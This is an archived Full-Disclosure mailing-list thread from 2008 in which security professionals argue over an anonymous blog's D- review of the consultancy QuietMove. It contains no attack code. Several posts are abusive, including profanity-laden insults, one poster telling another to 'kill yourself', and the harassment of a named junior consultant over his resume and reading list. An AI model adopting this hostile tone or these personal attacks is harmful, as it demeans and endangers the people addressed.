From adam.muntner at quietmove.com Tue Jan 1 15:04:48 2008 From: adam.muntner at quietmove.com (Adam Muntner) Date: Tue, 1 Jan 2008 10:04:48 -0500 Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - ) In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> Message-ID: <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com> Your review gets a d-. You can't add. You can't spell. Your skills appear to be limited to rudimentary use of a browser and linkedin.com. In combination with your undeserved and unearned sense of self importance, pretty pathetic. You spelled Marcin's last name wrong. Great use of linkedin.com. You can't even cunt n paste. He interned for us last semester. He isn't a front line consultant. So,you fail the ^c ^v and spelling practical, as well as the investigative one. We have 2 other consultants besides myself-they don't use linkedin and you didnt find them. Our clients know our consultants. We don't post their names on the website. F is for failure. As for my experience - I was also a the security officer for an at the time publicly traded company for 2 years, the IT director of 2 .com startups where security was my responsibility for several years, and for the last 2 have been deeply involved with all customer engagements. Prior to that I spent the 90s architecting, developing, and leading developer teams. I hsve been pentesting since 98 and nearly nonstop since 2000. You were what, 11 years old then? Clearly, basic arithmetic isn't a strong point of yours, either. I suspect you spent the 90s in grammar school. At lest you seemed to learn something there. On that note.... Most of our clients are referred by others who are very satisfied with the work we perform. Not by the website. It doesn't get a lot of attention - were small but growing and focused on serving our clients. 
I know basic HTML seems like the pinnacle of achievement to you, but we aren't in the business of making pretty web pages. We discuss our methodology with our clients-we don't post it on the web. I know you were hoping to learn nimething. Hacking for dummies might be more your speed, after you perfect your Cunt and Paste skills. I took the plunge and started what is now a growing business nearly 2 years ago, and we now serve 3 fortune 1000 clients, replacing much larger firms, plus a good number of midsize clients. Being an entrepreneur is a lot more challenging than being an anonymous anklebite, though from your moms basement it might not seem that way. I'm heading to Manhattan for some R&R right now. If you are in the vicinity let me know, I'll buy you a beer (if you're 21) and you can meet me yourself and post a review or somthing. Don't take this wrong - consider it constructive criticism and try harder next time. It's good to know we are recognized enough to be noticed by the mighty, anonymous secreview. This might even double our daily web traffic to 20 visitors. ;) Adam Muntner Managing Partner QuietMove, Inc. http://www.quietmove.com Sent from my iPhone On Dec 31, 2007, at 4:13 PM, secreview wrote: > QuiteMove, located at http://www.quitemove.com is a small > Professional IT Security Services Provider that offers Training > services, Incident Response Services, Web Application Security > Services and Penetration Testing Services. QuiteMove was started by > Adam Munter in 2006 along with Jeffrey Rassas, and James Garvey, Jr. > You can read their mission statement here "http://www.mywikibiz.com/Directory:QuietMove > " (but its pretty basic). > > When reviewing the QuiteMove website and people we were not the > least bit impressed. The QuiteMove website is packed full of > grammatical errors and many of the services don't even have > descriptions. The services that do have descriptions are very poorly > written and very poorly defined. 
Take a look at their Penetration > Testing service offering as an example. If you want to see an > example of no content check out their Social Engineering offering. > > Since we were unable to extract anything useful from the materials > provided to us by QuiteMove we decided to focus on the talent behind > QuietMove. Unfortunately we were equally unimpressed. The only > technically oriented team members that we were able to identify > within QuietMove were Adam Munter, who is a founder and Marcin > Wielgoszewsk, who is a very "green" consultant. Seeing as Adam > Munter is being positioned as the technical visionary for QuietMove, > we decided to focus on him and not on Marcin. > > Adam's Linkedin Bio: http://tinyurl.com/yt9j2y > > As it turns out Adam Munter worked for Accuvant, a company that > competes directly with Adam's QuietMove; prior to founding > QuietMove. Adam's role at Accuvant was to lead consultants on IT > Security Engagements for large orginazations. In conjunction with > this, Adam also spoke at conferences. He worked here for 1 year and > 1 month. > > Prior to working for Accuvant, Adam worked for Pegasus Solutions > Inc. as the acting Chief Security Officer. Pegasus is the largest > hotel reservation distribution system vendor and a major vendor of > Hotel Management systems. Adam did get some Sarbanes Oxley work > under his belt as he helped Pegasus to successfully "marshall" > through their first audit. Adam also initiated the program to help > get Pegasus to be Visa CISP compliant, including evaluating and > changing their handling of payment Cardholder data. He worked here > for 2 years and 1 month. > > From August 2000 to January 2003 Adam was a "Founding member of > IBM's Ethical Hacking Center of Competency." 
His responsibilities > included being a technical interviewer for new hires, a Penetration > Testing Subject Matter Expert, and the performance of consulting > engagements for clients ranging from midsize companies and > government agencies to the fortune 500. Adam worked for IBM for 2 > years and 6 months. > > So if we add up the relevant experience that Adam has had according > to his linked in bio we get 1 year and 1 month + 2 years and 6 > months, which is a grand total of 3 years and 7 months of > professional IT Security Consulting Experience. Not sure about our > readers, but to us at Secreview that hardly makes Adam an IT > Security Expert. > > But wait, now we have a discrepancy... > > According to the QuietMove website, Adam "has over 14 years of > experience in information security, software, and product R&D with 8 > years being dedicated solely to security." His QuietMove bio goes on > to say "Adam?s particular talents include penetration testing of web > and binary applications, networks, systems, and SCADA, ?social engi > neering? and physical penetration of facilities, and in developing p > rofessional services offerings." > > This just doesn't add up. > > Anyway, remember we didn't set out to bash anyone here, but Adam/ > QuietMove put himself/themselves in the line of fire. QuietMove > appears to be a very small and disorganized shop. Their website is > half-assed and incomplete and we can't say anything better about > their talent profile. We suggest that QuietMove complete their > website and review their talent profile, then we'll set out to do > another review and see if they score better. As of right now, we > can't give them more than a D-. We'll keep an eye on their website > and redo this review if they ever fix their issues. 
> > > Score Card (Click to Enlarge) > > -- > Posted By secreview to Professional IT Security Providers - Exposed > at 12/31/2007 11:32:00 AM > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/d7783f9a/attachment.html From adam.muntner at quietmove.com Tue Jan 1 15:18:14 2008 From: adam.muntner at quietmove.com (Adam Muntner) Date: Tue, 1 Jan 2008 10:18:14 -0500 Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( secreview review: D- ) In-Reply-To: <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com> References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com> Message-ID: <5506C1BC-5FE2-4C71-BBAB-FF7FFE176591@quietmove.com> Before secreview jumps on them, apologies for the typos. Hard to type long email on touchscreen, on the train! No hard feelings secreview. I apreciate the review. There is no such thing as bad press, and I had fun writing my witty and clever rejoinder. Adam Muntner Managing Partner QuietMove, Inc. Phone: 602-793-5969 Fax: 866-272-8194 http://www.quietmove.com Sent from my iPhone On Jan 1, 2008, at 10:04 AM, Adam Muntner wrote: > Your review gets a d-. > > You can't add. You can't spell. Your skills appear to be limited to > rudimentary use of a browser and linkedin.com. In combination with > your undeserved and unearned sense of self importance, pretty > pathetic. > > You spelled Marcin's last name wrong. Great use of linkedin.com. You > can't even cunt n paste. He interned for us last semester. He isn't > a front line consultant. So,you fail the ^c ^v and spelling > practical, as well as the investigative one. 
We have 2 other > consultants besides myself-they don't use linkedin and you didnt > find them. Our clients know our consultants. We don't post their > names on the website. > > F is for failure. > > As for my experience - I was also a the security officer for an at > the time publicly traded company for 2 years, the IT director of > 2 .com startups where security was my responsibility for several > years, and for the last 2 have been deeply involved with all > customer engagements. > Prior to that I spent the 90s architecting, developing, and leading > developer teams. > I hsve been pentesting since 98 and nearly nonstop since 2000. You > were what, 11 years old then? Clearly, basic arithmetic isn't a > strong point of yours, either. I suspect you spent the 90s in > grammar school. At lest you seemed to learn something there. > > On that note.... > > Most of our clients are referred by others who are very satisfied > with the work we perform. Not by the website. It doesn't get a lot > of attention - were small but growing and focused on serving our > clients. I know basic HTML seems like the pinnacle of achievement to > you, but we aren't in the business of making pretty web pages. We > discuss our methodology with our clients-we don't post it on the > web. I know you were hoping to learn nimething. Hacking for dummies > might be more your speed, after you perfect your Cunt and Paste > skills. > > I took the plunge and started what is now a growing business nearly > 2 years ago, and we now serve 3 fortune 1000 clients, replacing much > larger firms, plus a good number of midsize clients. Being an > entrepreneur is a lot more challenging than being an anonymous > anklebite, though from your moms basement it might not seem that way. > > I'm heading to Manhattan for some R&R right now. If you are in the > vicinity let me know, I'll buy you a beer (if you're 21) and you can > meet me yourself and post a review or somthing. 
> > Don't take this wrong - consider it constructive criticism and try > harder next time. It's good to know we are recognized enough to be > noticed by the mighty, anonymous secreview. This might even double > our daily web traffic to 20 visitors. ;) > > Adam Muntner > Managing Partner > QuietMove, Inc. > http://www.quietmove.com > > Sent from my iPhone > > On Dec 31, 2007, at 4:13 PM, secreview wrote: > >> QuiteMove, located at http://www.quitemove.com is a small >> Professional IT Security Services Provider that offers Training >> services, Incident Response Services, Web Application Security >> Services and Penetration Testing Services. QuiteMove was started by >> Adam Munter in 2006 along with Jeffrey Rassas, and James Garvey, >> Jr. You can read their mission statement here "http://www.mywikibiz.com/Directory:QuietMove >> " (but its pretty basic). >> >> When reviewing the QuiteMove website and people we were not the >> least bit impressed. The QuiteMove website is packed full of >> grammatical errors and many of the services don't even have >> descriptions. The services that do have descriptions are very >> poorly written and very poorly defined. Take a look at their >> Penetration Testing service offering as an example. If you want to >> see an example of no content check out their Social Engineering >> offering. >> >> Since we were unable to extract anything useful from the materials >> provided to us by QuiteMove we decided to focus on the talent >> behind QuietMove. Unfortunately we were equally unimpressed. The >> only technically oriented team members that we were able to >> identify within QuietMove were Adam Munter, who is a founder and >> Marcin Wielgoszewsk, who is a very "green" consultant. Seeing as >> Adam Munter is being positioned as the technical visionary for >> QuietMove, we decided to focus on him and not on Marcin. 
>> >> Adam's Linkedin Bio: http://tinyurl.com/yt9j2y >> >> As it turns out Adam Munter worked for Accuvant, a company that >> competes directly with Adam's QuietMove; prior to founding >> QuietMove. Adam's role at Accuvant was to lead consultants on IT >> Security Engagements for large orginazations. In conjunction with >> this, Adam also spoke at conferences. He worked here for 1 year and >> 1 month. >> >> Prior to working for Accuvant, Adam worked for Pegasus Solutions >> Inc. as the acting Chief Security Officer. Pegasus is the largest >> hotel reservation distribution system vendor and a major vendor of >> Hotel Management systems. Adam did get some Sarbanes Oxley work >> under his belt as he helped Pegasus to successfully "marshall" >> through their first audit. Adam also initiated the program to help >> get Pegasus to be Visa CISP compliant, including evaluating and >> changing their handling of payment Cardholder data. He worked here >> for 2 years and 1 month. >> >> From August 2000 to January 2003 Adam was a "Founding member of >> IBM's Ethical Hacking Center of Competency." His responsibilities >> included being a technical interviewer for new hires, a Penetration >> Testing Subject Matter Expert, and the performance of consulting >> engagements for clients ranging from midsize companies and >> government agencies to the fortune 500. Adam worked for IBM for 2 >> years and 6 months. >> >> So if we add up the relevant experience that Adam has had according >> to his linked in bio we get 1 year and 1 month + 2 years and 6 >> months, which is a grand total of 3 years and 7 months of >> professional IT Security Consulting Experience. Not sure about our >> readers, but to us at Secreview that hardly makes Adam an IT >> Security Expert. >> >> But wait, now we have a discrepancy... 
>> >> According to the QuietMove website, Adam "has over 14 years of >> experience in information security, software, and product R&D with >> 8 years being dedicated solely to security." His QuietMove bio goes >> on to say "Adam?s particular talents include penetration testing o >> f web and binary applications, networks, systems, and SCADA, ?soci >> al engineering? and physical penetration of facilities, and in dev >> eloping professional services offerings." >> >> This just doesn't add up. >> >> Anyway, remember we didn't set out to bash anyone here, but Adam/ >> QuietMove put himself/themselves in the line of fire. QuietMove >> appears to be a very small and disorganized shop. Their website is >> half-assed and incomplete and we can't say anything better about >> their talent profile. We suggest that QuietMove complete their >> website and review their talent profile, then we'll set out to do >> another review and see if they score better. As of right now, we >> can't give them more than a D-. We'll keep an eye on their website >> and redo this review if they ever fix their issues. >> >> >> Score Card (Click to Enlarge) >> >> -- >> Posted By secreview to Professional IT Security Providers - Exposed >> at 12/31/2007 11:32:00 AM >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... 
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/74c50c00/attachment.html From marcinw86 at gmail.com Tue Jan 1 16:57:36 2008 From: marcinw86 at gmail.com (Marcin Wielgoszewski) Date: Tue, 01 Jan 2008 11:57:36 -0500 Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - ) In-Reply-To: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> Message-ID: <1199206656.15507.12.camel@thinker.ph.cox.net> Marcin Wielgoszewski here, the "green consultant" you mentioned but chose not to focus on. I'm not sure what you mean by "green," but whatever. I have just finished my bachelor's degree, have done internships with some Fortune-100's and I am constantly doing research on my own. I also make an effort to attend every conference and local meet-up. I have my own blog I started at http://www.tssci-security.com, you can read and learn more about me. Onto QuietMove and Adam Muntner... QuietMove was founded by Adam and the other two folks you mention. I have done some part-time work with Adam over the past couple months while finishing up my last semester. Adam knows this industry inside-out, and one of only several people I would say really knows his stuff. I'm sorry the website doesn't have an infosec glossary of terms for you to study for your Security+. I guess looking on LinkedIn and the website passes off as "research" nowadays. Couldn't you have at least used Maltego to look deeper into this? I was actually going to make a post about how pathetic the "research" some people have tried to pass off lately in security, and no one, except for a few have called anyone out on it. Some security consulting firms you would give a higher score are some of the firms we've picked up where traceroute, whois and their nmap scanners left off. 
From adam.muntner at quietmove.com Tue Jan 1 17:09:39 2008 From: adam.muntner at quietmove.com (Adam Muntner) Date: Tue, 1 Jan 2008 12:09:39 -0500 Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - ) In-Reply-To: <1199206656.15507.12.camel@thinker.ph.cox.net> References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net> Message-ID: <15924523-264D-4115-8B10-9A642E87145A@quietmove.com> Secreview, you might learn something by reading Marcin's blog. Adam Muntner Managing Partner QuietMove, Inc. Fax: 866-272-8194 http://www.quietmove.com Sent from my iPhone On Jan 1, 2008, at 11:57 AM, Marcin Wielgoszewski wrote: > Marcin Wielgoszewski here, the "green consultant" you mentioned but > chose not to focus on. I'm not sure what you mean by "green," but > whatever. I have just finished my bachelor's degree, have done > internships with some Fortune-100's and I am constantly doing research > on my own. I also make an effort to attend every conference and local > meet-up. I have my own blog I started at http://www.tssci-security.com > , > you can read and learn more about me. > > Onto QuietMove and Adam Muntner... QuietMove was founded by Adam and > the other two folks you mention. I have done some part-time work with > Adam over the past couple months while finishing up my last semester. > Adam knows this industry inside-out, and one of only several people I > would say really knows his stuff. I'm sorry the website doesn't > have an > infosec glossary of terms for you to study for your Security+. I > guess > looking on LinkedIn and the website passes off as "research" nowadays. > Couldn't you have at least used Maltego to look deeper into this? I > was > actually going to make a post about how pathetic the "research" some > people have tried to pass off lately in security, and no one, except > for > a few have called anyone out on it. 
> > Some security consulting firms you would give a higher score are > some of > the firms we've picked up where traceroute, whois and their nmap > scanners left off. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From reepex at gmail.com Tue Jan 1 18:12:51 2008 From: reepex at gmail.com (reepex) Date: Tue, 1 Jan 2008 12:12:51 -0600 Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - ) In-Reply-To: <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com> References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com> Message-ID: On Jan 1, 2008 9:04 AM, Adam Muntner wrote: > I hsve been pentesting since 98 and nearly nonstop since 2000. > You cannot spell either and you have been a 'pentester' ... does this mean you ran nessus and other automated testing tools and call yourself a hacker? > Sent from my iPhone > Please kill yourself -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080101/64d25b09/attachment.html From silentrunner at hushmail.com Tue Jan 1 18:05:10 2008 From: silentrunner at hushmail.com (SilentRunner) Date: Tue, 01 Jan 2008 18:05:10 +0000 Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - ) Message-ID: <20080101180510.CB6851A0038@mailserver8.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Adam I appreciate that you have to defend your firm, but why are you giving the skiddie the satisfaction of even acknowledging his existence? Don't be fooled by the "we", secreview is one person. A kid of maybe 15 sitting in his room looking for something better to do besides squeezing spots and masturbating to the demo dollies on the shopping channel. 
Not a single person here has had anything but derision for the fool's efforts, none of which have added or will ever add anything useful to the trade. I look forward to the day when he "reviews" a big firm and they send the lawyers in to hopefully take his parents (some people shouldn't be allowed to breed) house, and his computer away. If he is universally ignored, he will get bored and go away. Perhaps with luck he will direct his reviewing "talents" to something useful, like hairdressers, or cosmetics, where simply reading a website has some relevance to the product, not. SR On Tue, 01 Jan 2008 15:04:48 +0000 Adam Muntner wrote: >Your review gets a d-. > >You can't add. You can't spell. Your skills appear to be limited >to >rudimentary use of a browser and linkedin.com. In combination with > >your undeserved and unearned sense of self importance, pretty >pathetic. > >You spelled Marcin's last name wrong. Great use of linkedin.com. >You >can't even cunt n paste. He interned for us last semester. He >isn't a >front line consultant. So,you fail the ^c ^v and spelling >practical, >as well as the investigative one. We have 2 other consultants >besides >myself-they don't use linkedin and you didnt find them. Our >clients >know our consultants. We don't post their names on the website. > >F is for failure. > >As for my experience - I was also a the security officer for an at >the >time publicly traded company for 2 years, the IT director of 2 >.com >startups where security was my responsibility for several years, >and >for the last 2 have been deeply involved with all customer >engagements. >Prior to that I spent the 90s architecting, developing, and >leading >developer teams. >I hsve been pentesting since 98 and nearly nonstop since 2000. You > >were what, 11 years old then? Clearly, basic arithmetic isn't a >strong >point of yours, either. I suspect you spent the 90s in grammar >school. >At lest you seemed to learn something there. > >On that note.... 
> >Most of our clients are referred by others who are very satisfied >with >the work we perform. Not by the website. It doesn't get a lot of >attention - were small but growing and focused on serving our >clients. >I know basic HTML seems like the pinnacle of achievement to you, >but >we aren't in the business of making pretty web pages. We discuss >our >methodology with our clients-we don't post it on the web. I know >you >were hoping to learn nimething. Hacking for dummies might be more >your >speed, after you perfect your Cunt and Paste skills. > >I took the plunge and started what is now a growing business >nearly 2 >years ago, and we now serve 3 fortune 1000 clients, replacing much > >larger firms, plus a good number of midsize clients. Being an >entrepreneur is a lot more challenging than being an anonymous >anklebite, though from your moms basement it might not seem that >way. > >I'm heading to Manhattan for some R&R right now. If you are in the > >vicinity let me know, I'll buy you a beer (if you're 21) and you >can >meet me yourself and post a review or somthing. > >Don't take this wrong - consider it constructive criticism and try > >harder next time. It's good to know we are recognized enough to be > >noticed by the mighty, anonymous secreview. This might even double >our >daily web traffic to 20 visitors. ;) > >Adam Muntner >Managing Partner >QuietMove, Inc. >http://www.quietmove.com > >Sent from my iPhone > >On Dec 31, 2007, at 4:13 PM, secreview >wrote: > >> QuiteMove, located at http://www.quitemove.com is a small >> Professional IT Security Services Provider that offers Training > >> services, Incident Response Services, Web Application Security >> Services and Penetration Testing Services. QuiteMove was started >by >> Adam Munter in 2006 along with Jeffrey Rassas, and James Garvey, >Jr. >> You can read their mission statement here >"http://www.mywikibiz.com/Directory:QuietMove >> " (but its pretty basic). 
>> >> When reviewing the QuiteMove website and people we were not the > >> least bit impressed. The QuiteMove website is packed full of >> grammatical errors and many of the services don't even have >> descriptions. The services that do have descriptions are very >poorly >> written and very poorly defined. Take a look at their >Penetration >> Testing service offering as an example. If you want to see an >> example of no content check out their Social Engineering >offering. >> >> Since we were unable to extract anything useful from the >materials >> provided to us by QuiteMove we decided to focus on the talent >behind >> QuietMove. Unfortunately we were equally unimpressed. The only >> technically oriented team members that we were able to identify > >> within QuietMove were Adam Munter, who is a founder and Marcin >> Wielgoszewsk, who is a very "green" consultant. Seeing as Adam >> Munter is being positioned as the technical visionary for >QuietMove, >> we decided to focus on him and not on Marcin. >> >> Adam's Linkedin Bio: http://tinyurl.com/yt9j2y >> >> As it turns out Adam Munter worked for Accuvant, a company that > >> competes directly with Adam's QuietMove; prior to founding >> QuietMove. Adam's role at Accuvant was to lead consultants on IT > >> Security Engagements for large orginazations. In conjunction >with >> this, Adam also spoke at conferences. He worked here for 1 year >and >> 1 month. >> >> Prior to working for Accuvant, Adam worked for Pegasus Solutions > >> Inc. as the acting Chief Security Officer. Pegasus is the >largest >> hotel reservation distribution system vendor and a major vendor >of >> Hotel Management systems. Adam did get some Sarbanes Oxley work > >> under his belt as he helped Pegasus to successfully "marshall" >> through their first audit. Adam also initiated the program to >help >> get Pegasus to be Visa CISP compliant, including evaluating and > >> changing their handling of payment Cardholder data. 
He worked >here >> for 2 years and 1 month. >> >> From August 2000 to January 2003 Adam was a "Founding member of > >> IBM's Ethical Hacking Center of Competency." His >responsibilities >> included being a technical interviewer for new hires, a >Penetration >> Testing Subject Matter Expert, and the performance of consulting > >> engagements for clients ranging from midsize companies and >> government agencies to the fortune 500. Adam worked for IBM for >2 >> years and 6 months. >> >> So if we add up the relevant experience that Adam has had >according >> to his linked in bio we get 1 year and 1 month + 2 years and 6 >> months, which is a grand total of 3 years and 7 months of >> professional IT Security Consulting Experience. Not sure about >our >> readers, but to us at Secreview that hardly makes Adam an IT >> Security Expert. >> >> But wait, now we have a discrepancy... >> >> According to the QuietMove website, Adam "has over 14 years of >> experience in information security, software, and product R&D >with 8 >> years being dedicated solely to security." His QuietMove bio >goes on >> to say "Adam?s particular talents include penetration testing of >web >> and binary applications, networks, systems, and SCADA, ?social >engi >> neering? and physical penetration of facilities, and in >developing p >> rofessional services offerings." >> >> This just doesn't add up. >> >> Anyway, remember we didn't set out to bash anyone here, but >Adam/ >> QuietMove put himself/themselves in the line of fire. QuietMove > >> appears to be a very small and disorganized shop. Their website >is >> half-assed and incomplete and we can't say anything better about > >> their talent profile. We suggest that QuietMove complete their >> website and review their talent profile, then we'll set out to >do >> another review and see if they score better. As of right now, we > >> can't give them more than a D-. 
We'll keep an eye on their >website >> and redo this review if they ever fix their issues. >> >> >> Score Card (Click to Enlarge) >> >> -- >> Posted By secreview to Professional IT Security Providers - >Exposed >> at 12/31/2007 11:32:00 AM >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkd6gNYACgkQBGNKW24YMAeDsgP/WXrFSFiSws8FjqvKEUIjFa7l/FDf CZMGF8DLNhJJJE5Wnix95G8+WEV7nWqwv9m20/xRfcDd9S9L3xSiRx5ljZTB5gJEXwxn PqF9c0wd+lrQsjzuqwwUUbwvJN8nOfna0IQ+ZFElRGb+y++d8sxTty8Vf4G0DcsJycmO WACPxgE= =xFU2 -----END PGP SIGNATURE----- -- Click here for huge discounts on tradeshow supplies. http://tagline.hushmail.com/fc/Ioyw6h4eC7Vdiu1ZzArauAHTdGztWTfXZcO45Bc0E15vxeFbmmoc0w/ From reepex at gmail.com Tue Jan 1 18:33:36 2008 From: reepex at gmail.com (reepex) Date: Tue, 1 Jan 2008 12:33:36 -0600 Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - ) In-Reply-To: <1199206656.15507.12.camel@thinker.ph.cox.net> References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net> Message-ID: You are worthless. http://www.tssci-security.com/bookshelf/ Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading operating system design and implementation when you do not know C? ( Seeing as C books are in your 'to-read' list ). Do you understand any of the code in it or do you just pick out buzz words to talk about at your 'local meet-ups'. Why dont you explain the finer points of microkernel design to us? 
You are headed even further down the path of complete lamer seeing as you read books on XSS and all your blog posts revolve around it.

even more lulz in your 'plan to read' containing books on fuzzing, metasploit, and writing rootkits. How can you write rootkits when you do not know C and are learning basic unix commands?... lol

Hopefully one day you realize that you are just another security industry kiddie and have no real knowledge, but probably not. Seeing as you have your 'bachelors' ( lol - has nothing to do with security ) - I am sure you are well on your way to a cissp.

Also for good laugh people should read:

http://www.tssci-security.com/projects/

how long did it take you to write all 40 lines of your 'labs' code? I shall notify perl underground of your horrendous perl and you shall be a source of great lulz in their next production.

Just found this:
http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf
So you worked 4 places and did nothing useful. Sounds like Simon may want to hire you. ( Hi simon , are your workers still inadequate and you need more help? )

So basically you have worked 4 jobs, went to a community college that has some sort of security program, you know basic perl and C, do not know how to audit any real programs, and blog about XSS. Does this summarize you pretty well?

On Jan 1, 2008 10:57 AM, Marcin Wielgoszewski wrote:
> Marcin Wielgoszewski here, the "green consultant" you mentioned but
> chose not to focus on. I'm not sure what you mean by "green," but
> whatever. I have just finished my bachelor's degree, have done
> internships with some Fortune-100's and I am constantly doing research
> on my own. I also make an effort to attend every conference and local
> meet-up. I have my own blog I started at http://www.tssci-security.com,
> you can read and learn more about me.
>
> Onto QuietMove and Adam Muntner... QuietMove was founded by Adam and
> the other two folks you mention.
> I have done some part-time work with
> Adam over the past couple months while finishing up my last semester.
> Adam knows this industry inside-out, and one of only several people I
> would say really knows his stuff. I'm sorry the website doesn't have an
> infosec glossary of terms for you to study for your Security+. I guess
> looking on LinkedIn and the website passes off as "research" nowadays.
> Couldn't you have at least used Maltego to look deeper into this? I was
> actually going to make a post about how pathetic the "research" some
> people have tried to pass off lately in security, and no one, except for
> a few have called anyone out on it.
>
> Some security consulting firms you would give a higher score are some of
> the firms we've picked up where traceroute, whois and their nmap
> scanners left off.

From lasveda at gmail.com Tue Jan 1 18:47:25 2008
From: lasveda at gmail.com (veda)
Date: Tue, 01 Jan 2008 19:47:25 +0100
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1B24AD54-11D8-44D5-8EB2-2A512C26C365@quietmove.com>
Message-ID: <477A8ABD.7020701@gmail.com>

reepex wrote:
> On Jan 1, 2008 9:04 AM, Adam Muntner wrote:
>
> > I hsve been pentesting since 98 and nearly nonstop since 2000.
>
> You cannot spell either and you have been a 'pentester' ... does this
> mean you ran nessus and other automated testing tools and call
> yourself a hacker?
>
> > Sent from my iPhone
>
> Cares?
> > Please kill yourself

You all need to grow up a bit, and stfu.

From dentonj at gmail.com Tue Jan 1 19:06:45 2008
From: dentonj at gmail.com (Jeffrey Denton)
Date: Tue, 1 Jan 2008 20:06:45 +0100
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID: <8ebbd7f50801011106x75245a82m41c21586a6c27984@mail.gmail.com>

On Jan 1, 2008 7:33 PM, reepex wrote:
> http://www.tssci-security.com/bookshelf/
>
> Is this list up to date? It makes it seem as if you are learning basic
> linux commands, sed, and basic perl. Also why are you reading operating
> system design and implementation when you do not know C? ( Seeing as C books
> are in your 'to-read' list ).

The C programming book listed on the bookshelf has been given a "Not Recommended" review by the ACCU.

From marcinw86 at gmail.com Tue Jan 1 19:08:11 2008
From: marcinw86 at gmail.com (Marcin Wielgoszewski)
Date: Tue, 1 Jan 2008 14:08:11 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net>
Message-ID:

You're right. I'm new and young and I'll be the first to admit it. We can't all be born security gurus, and I'm not trying to hide that, but me aside... what have you done besides hide behind your gmail account and troll FD?

Thanks for pointing out those two pages, two pages out of 100's that were posted a long time ago and yes, are very out of date.

On Jan 1, 2008 1:33 PM, reepex wrote:
> You are worthless.
>
> http://www.tssci-security.com/bookshelf/
>
> Is this list up to date? It makes it seem as if you are learning basic
> linux commands, sed, and basic perl. Also why are you reading operating
> system design and implementation when you do not know C?
( Seeing as C books > are in your 'to-read' list ). Do you understand any of the code in it or do > you just pick out buzz words to talk about at your 'local meet-ups'. Why > dont you explain the finer points of microkernel design to us? > > You are headed even further down the path of complete lamer seeing as you > read books on XSS and all your blog posts revolve around it. > > even more lulz in your 'plan to read' containing books on fuzzing, > metasploit, and writing rootkits. How can you write rootkits when you do not > know C and are learning basic unix commands?... lol > > Hopefully one day you realize that you are just another security industry > kiddie and have no real knowledge, but probably not. Seeing as you have your > 'bachelors' ( lol - has nothing to do with security ) - I am sure you are > well on your way to a cissp. > > Also for good laugh speople should read: > > http://www.tssci-security.com/projects/ > > how long did it take you to write all 40 lines of your 'labs' code? I shall > notify perl underground of your horrendous perl and you shalll be a source > of great lulz in their next production. > > Just found this: > http://www.tssci-security.com/blog/wp-content/uploads/2007/11/mwielgoszewski_resume.pdf > So you worked 4 places and did nothing useful. Sounds like SImon may want to > hire you. ( Hi simon , are your workers still inadequate and you need more > help? ) > > So basically you have worked 4 jobs, went to a community college that has > some sort of security program, you know basic perl and C, do not know how to > audit any real programs, and blog about XSS. Does this summarize you > pretty well? 
>

From adam.muntner at quietmove.com Tue Jan 1 19:33:36 2008
From: adam.muntner at quietmove.com (Adam Muntner)
Date: Tue, 1 Jan 2008 14:33:36 -0500
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To:
